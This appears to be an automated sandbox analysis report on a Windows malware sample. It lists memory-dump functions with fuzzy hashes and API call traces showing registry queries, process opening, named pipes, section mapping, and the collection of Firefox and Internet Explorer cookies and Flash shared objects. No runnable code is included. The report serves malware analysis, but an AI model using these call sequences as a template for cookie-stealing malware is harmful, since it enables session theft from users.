  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 1
  • API ID: GetLastErrorRtlAllocateHeap$CloseHandle$CreateMutexLoadLibraryNtQueryInformationProcessOpenProcessmemsetwsprintf
  • String ID:
  • API String ID: 2923459890-0
  • Opcode ID: fd4dac6fec6db53c5973630ed042fd72ea6fdc6dc32fc90b99fe3bec89cdeab6
  • Instruction ID: 26bfd73ccc71b3223ffb0c1a9f99629be3cba527ef27f26009e6f75bafa4995c
  • Opcode Fuzzy Hash: 2931CEB24D0A104BA11F6050C8A877FAB0BF7817E5DDC5B17FE007448D6F4BA9E06B6A
  • Instruction Fuzzy Hash: 26bfd73ccc71b3223ffb0c1a9f99629be3cba527ef27f26009e6f75bafa4995c
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001CD561
  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
  • CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001D813C: GetVersion.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001D8187
    • Part of subcall function 001D813C: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001D81B4
    • Part of subcall function 001CB7D1: RtlAllocateHeap.NTDLL(00000000,-00000003,00000000), ref: 001CB7EB
    • Part of subcall function 001CB7D1: RtlAllocateHeap.NTDLL(00000000,00000838,001E5124), ref: 001DA8C6
    • Part of subcall function 001CB7D1: RtlInitializeCriticalSection.NTDLL(00000000), ref: 001DA8D3
    • Part of subcall function 001CB7D1: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001DA91A
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
  • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
  • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
  • CloseHandle.KERNEL32(00000000), ref: 001CD689
  • RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001DC938: memcpy.NTDLL(001EB114,?,00000018,001CD6EA,?,00000000,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001DC94A
    • Part of subcall function 001CD47D: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,001CD6F9,001EB0D4,?,?,00000000,001CD6F9), ref: 001CD4B1
    • Part of subcall function 001CD47D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CD511
    • Part of subcall function 001CB410: GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001CB410: GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
    • Part of subcall function 001CB410: CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
    • Part of subcall function 001CB410: CloseHandle.KERNEL32(00000000), ref: 001CB490
    • Part of subcall function 001CB410: GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C3D4D: RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001C3D4D: RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
    • Part of subcall function 001C3D4D: wsprintfA.USER32 ref: 001C3E55
  • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
  • LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CBEAE: CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
    • Part of subcall function 001CBEAE: CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
    • Part of subcall function 001CBEAE: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
    • Part of subcall function 001CBEAE: CloseHandle.KERNEL32(00000000), ref: 001CBF09
    • Part of subcall function 001CBEAE: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
  • wsprintfA.USER32 ref: 001CD849
    • Part of subcall function 001CD0AE: StrChrA.SHLWAPI(?,00000020), ref: 001CD11E
    • Part of subcall function 001CD0AE: HeapFree.KERNEL32(00000000,?,00000125), ref: 001CD166
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
